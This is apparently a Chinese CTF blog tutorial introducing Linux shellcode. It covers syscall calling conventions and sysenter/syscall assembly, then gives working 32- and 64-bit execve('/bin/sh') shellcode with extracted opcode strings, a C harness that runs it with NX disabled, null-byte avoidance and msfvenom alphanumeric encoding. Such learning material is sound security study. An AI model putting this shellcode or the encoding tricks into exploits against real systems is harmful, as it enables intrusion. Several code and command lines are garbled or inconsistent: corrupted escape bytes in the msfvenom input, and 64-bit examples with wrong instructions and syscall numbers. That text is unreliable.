Linux—shellcode开发入门

2022-08-05 CTF shellcode 评论字数统计: 2.2k(字) 阅读时长: 10(分)

[toc]

1. 什么是 shellcode ？

shellcode 通常用机器语言编写，是一段用于软件漏洞而执行的代码，因其目的常常是让攻击者获得目标机器的命令行 shell 而得名。随着发展，shellcode 现在代表将插入到漏洞利用程序中以完成所需任务的任何字节码。

2. shellcode 原理

2.1 理解系统调用

shellcode 通常是一段能够执行某些系统调用的代码，所以直接通过一个int 0x80系统调用，指定想调用的函数的系统调用号（syscall），传入调用函数的参数，即可。

Linux 操作系统（2.6及更早的内核版本），通常用 int $0x80软中断 + 系统调用号（保存到eax中）来实现系统调用，其参数传递顺序依次为 ebx、ecx、edx、esi和edi，返回值存放在eax。

.data
msg:
	.ascii "hello 32-bit!\n"
	len = . - msg
	
.text
	.global _start

_start:
	movl $len, %edx
	movl $msg, %ecx
	movl $1, %ebx
	movl $4, %eax
	int $0x80
	
	movl $0, %ebx
	movl $1, %eax
	int $0x80

编译执行（可编译成 64 位程序）：用gcc编译，生成目标文件，用ld来链接

$ gcc -m32 -c hello32.S
$ ld -m elf_i386 -o hello32 hello32.o
$ strace ./hello32                                                                   127 ⨯
execve("./hello32", ["./hello32"], 0x7ffd941ae900 /* 61 vars */) = 0
[ Process PID=3197 runs in 32 bit mode. ]
write(1, "hello 32-bit!\n", 14hello 32-bit!
)         = 14
exit(0)                                 = ?
+++ exited with 0 +++

虽然软中断 int 0x80 非常经典，但是由于其性能较差，在往后的内核中被快速调用指令代替，32 位系统使用 sysenter(对应 sysexit)指令，64 位系统则使用 syscall（对应 sysret）指令。

2.2 调用约定

调用约定是对函数调用时如何传递参数的一种约定。

（1）内核接口

x86-32 系统调用约定：Linux系统调用使用寄存器传递参数。eax 存放系统调用号（syscall_number），ebx、ecx、edx、esi 和 ebp 用于将6个参数传递给系统调用。返回值保存在 eax 中。所有其它寄存器（包括 EFLAGS）都保存在 int 0x80 中。
x86-64 系统调用约定：系统调用的参数限制为 6 个，不直接从堆栈上传递任何参数。==rax 存放系统调用号（syscall_namber）。内核接口使用的寄存器有 rdi、rsi、rdx、rcx、r8 和 r9。==系统调用通过 syscall 指令完成。除了 rcx、r11 和 eax，其它寄存器都被保留。返回值保存在 rax 中，只有 INTEGER 或者 MEMORY 类型的值才会被传递给内核。

（2）用户接口

x86-32 函数调用约定：参数通过栈进行传递。最后一个参数第一个被放入栈中，知道所有的参数都放置完毕，然后执行 call 指令。
x86-64 函数调用约定：x86-64 下通过寄存器传递参数，这样做比栈更有效率。它避免了内存中参数的存取和额外的指令。根据参数类型的不同，会使用寄存器或传参方式。如果参数类型是 MEMORY，则在栈上传递参数。如果类型是 INTEGER，则==顺序使用 rdi、rsi、rdx、rcx、r8 和 r9。==如果多于 6 个参数，则后面的参数将在栈中传递。

2.2 *32位程序使用 sysenter 的例子

.data
msg:
	.ascii "Hello sysenter!\n"
	len = . - msg
	
.text 
	.globl _start

_start:
	movl $len, %edx
	movl $msg, %ecx
	movl $1, %ebx
	movl $4, %eax
	#为sysenter布置栈
	pushl $sysenter_ret
	pushl %ecx
	pushl %edx
	pushl %ebp
	movl %esp,%ebp
	sysenter
	
sysenter_ret:
	movl $0, %ebx
	movl $1, %eax
	#为sysenter布置栈
	pushl $sysenter_ret
	pushl %ecx
	pushl %edx
	pushl %ebp
	movl %esp,%ebp
	sysenter

可以看到，为了使用 sysenter 指令，需要手动为其布置栈。这是因为 sysenter 返回时，会执行 _kernel_vsyscall 的后半部分（从 0xf7fd5059 开始）。_kernel_vsyscall 封装了 sysenter 调用的规范，是 vDSO 的一部分，而 vDSO 运行程序在用户层中执行代码。

gdb-peda$ disasseble __kernel_vsyscall
	0xf7fd5050 <+0>:	push 	ecx
	0xf7fd5051 <+1>:	push 	edx
	0xf7fd5052 <+2>:	push 	ebp
	0xf7fd5053 <+3>:	mov		ebp,esp
	0xf7fd5055 <+5>:	sysenter
	0xf7fd5057 <+7>:	int 	0x80
-->	0xf7fd5059 <+9>:	pop		ebp
	0xf7fd505a <+10>:	pop		edx
	0xf7fd505b <+11>:	pop 	ecx
	0xf7fd505c <+12>:	ret

编译执行（不可编译成 64 位程序）

$ gcc -m32 -c sysenter32.S
$ ld -m elf_i386 -o sysenter sysenter32.o
$ strace ./sysenter
execve("./sysenter", ["./sysenter"], 0x7ffe74dda6e0 /* 61 vars */) = 0
[ Process PID=3638 runs in 32 bit mode. ]
write(1, "Hello sysenter!\n", 16Hello sysenter!
)       = 16
exit(0)                                 = ?
+++ exited with 0 +++

2.3 *64位程序使用 syscall 的例子

.data
msg:
	.ascii "hello 32-bit!\n"
	len = . - msg
	
.text
	.global _start

_start:
	movl $1, %rdi
	movl $msg, %rsi
	movl $1, %rdx
	movl $4, %rax
	syscall
	
	xorq %rdi, %rdi
	movq $60, %rax
	syscall

编译执行（不可编译成 32 位程序）

$ gcc -c hello64.S 
$ ld -o hello64 hello64.o
$ strace ./hello64 
execve("./hello64", ["./hello64"], 0x7fffe7d694a0 /* 61 vars */) = 0
write(1, "hello 64-bit!\n", 14hello 64-bit!
)         = 14
exit(0)                                 = ?
+++ exited with 0 +++

3. 编写简单 shellcode

shellcode 只是一段代码，为了运行和验证，我们通常用函数指针或者内联函数的方式把它嵌入到C程序中来调用。

#include <stdio.h>
#include <string.h>

char shellcode[] = "";
int main()
{
    //当shellcode包含空字符时，printf 将会打印出错误的 shellcode 长度
    printf("Shellcode length: %d bytes\n",strlen(shellcode));
    (*(void(*)())shellcode)();
    
    //污染所有寄存器，确保shellcode 在任何环境下都能运行
    /* __asm__(
    		"mov %eax, %ebx\n\t"
			"mov %eax, %ecx\n\t"
            "mov %eax, %edx\n\t"
            "mov %eax, %esi\n\t"
            "mov %eax, %edi\n\t"
            "mov %eax, %ebp\n\t"
            "call shellcode");
	*/
}

在 shell-storm找一些 shellcode 学习案例，先看一个实现 execve("/bin/sh") 的 Linux 32位的程序。

global _start
section .text

_start:
	; int execve(const char *filename, char *const argv[], char *const envp[])

	xor		ecx, ecx		; ecx = NULL
	mul		ecx				; eax and edx = NULL
	mov		al, 11			; execve syscall
	push	ecx				; string NULL
	push	0x68732f2f		; "//sh"
	push	0x6e69622f		; "/bin"
	mov		ebx, esp		; pointer to "/bin/sh\0" string
	int		0x80			; bingo

首先用 NASM 对这段汇编代码进行编译，然后使用 ld 链接，运行后获得shell

$ nasm -f elf32 tiny_execve_sh.asm
$ ld -m elf_i386 tiny_execve_sh.o -o tiny_execve_sh 
$ ./tiny_execve_sh 
$ objdump -d tiny_execve_sh           \                                               127 ⨯

tiny_execve_sh：     文件格式 elf32-i386

Disassembly of section .text:
08049000 <_start>:
 8049000:       31 c9                   xor    %ecx,%ecx
 8049002:       f7 e1                   mul    %ecx
 8049004:       b0 0b                   mov    $0xb,%al
 8049006:       51                      push   %ecx
 8049007:       68 2f 2f 73 68          push   $0x68732f2f
 804900c:       68 2f 62 69 6e          push   $0x6e69622f
 8049011:       89 e3                   mov    %esp,%ebx
 8049013:       cd 80                   int    $0x80

为了在 C 程序中使用这段 shellcode，我们需将其 opcode 提取出来（我这里 cut:无效的字段范围）

1
2

$ objdump -d ./tiny_execve_sh|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
	"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"

将提取出来的字符放到 C 程序的 shellcode[] 中。需要注意的是，shellcode 作为全局初始化变量，存放在 .data 段中，而编译时默认开启的 NX 保护机制，会将数据所在的内存页标识为不可执行，当程序转入 shellcode 执行时抛出异常。因此，下面需要关闭 NX。

1 2	$ gcc -m32 -z execstack tiny_execve_sh_shellcode.c -o tiny_execve_sh_shellcode $ ./tiny_execve_sh_shellcode

Linux 64 位的 shellcode 也一样。

global _start
section .text
 
_start:
	; execve("/bin/sh", ["/bin/sh"], NULL)
	;"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"

	xor		rdx, rdx
	mov		qword rbx, '//bin/sh'		; 0x68732f6e69622f2f
	shr		rbx, 0x8
	push		rbx
	mov		rdi, rsp
	push		rax
	push		rdi
	mov		rsi, rsp
	mov		al, 0x3b
	syscall

1
2
3

$ nasm -f elf64 tiny_execve_sh64.asm 
$ ld -m elf_x86_64 tiny_execve_sh64.o -o tiny_execve_sh64 
$ ./tiny_execve_sh64

4. shellcode 变形

有时，被注入进程的 shellcode 会被限制使用某些字符，例如不能有 NULL、只能用字母和数字等可见字符、ASCII 和 Unicode 编码转换等，因此需要进行一些处理。

由于 NULL 会将字符串操作函数截断，所以我们需要用其它相似功能的指令来替代，下面是一个 32 位指令替换的例子。

替换前：
B8 01000000 MOV		EAX,1

替换后：
33C0		XOR EAX,EAX
40			INC EAX

对于只能使用可见字符字母（也就是只能用字母和数字组合）的情况，将 shellcode 的字符进行编码，使其符合限制条件。相应地，需要在 shellcode 中加入解码器，在代码行前将原始 shellcode 还原出来。

著名的渗透测试框架 Metasploit 中就集成了许多 shellcode 的编码器，这里我们选择 x86/alpha_mixed 来编码 32 位的 shellcode。

$ msfvenom -1 encoders | grep -i alphanumeric
	x86/alpha_mixed 	low		Alpha2 Alphanumeric Mixedcase Encoder
	x86/alpha_upper		low		Alpha2 Alphanumeric Uppercase Encoder
	x86/unicode_mixed	manual 	Alpha2 Alphanumeric Unicode Mixedcase Encoder
	x86/unicode uDper	manual 	Alpha2 Alphanumeric Unicode Uppercase Encoder

$ python -c 'import sys; sys.stdout.write("\x31\xc9\xf7\xel\xb0\x0b\x51\
x68\:<2f\x2f\xT?3\x68\x68\x2f\x62\x69\x6e\x89\xo3\xcd\x80")' | msfveno -p - -e x86/alpha_mixed -a linux -f raw -a x86 --platform linux BufterRegister=EAX 
Attempting to encode payload with 1 iterations of x86/alpha_mixed 
x86/alpha_mixed succeeded with size 96 (iteration=0)
x86/alpha mixed chosen with final size 96
Payload size: 96 bytes
	PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI01o9igHah04Ksa3XTodot31
xBHtorBcYpnniis8MOpAA

参考：
Linux下shellcode的编写
带你玩转 Linux Shellcode
简述获取shellcode的几种方式
Linux下Shellcode编写
Linux Syscall Table
《CTF竞赛权威指南》

本文链接： https://www.rgzzplus.com/2022/08/05/Linux-shellcode开发入门/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY 4.0 CN协议许可协议。转载请注明出处！

人工智障plus

一只网安菜鸟。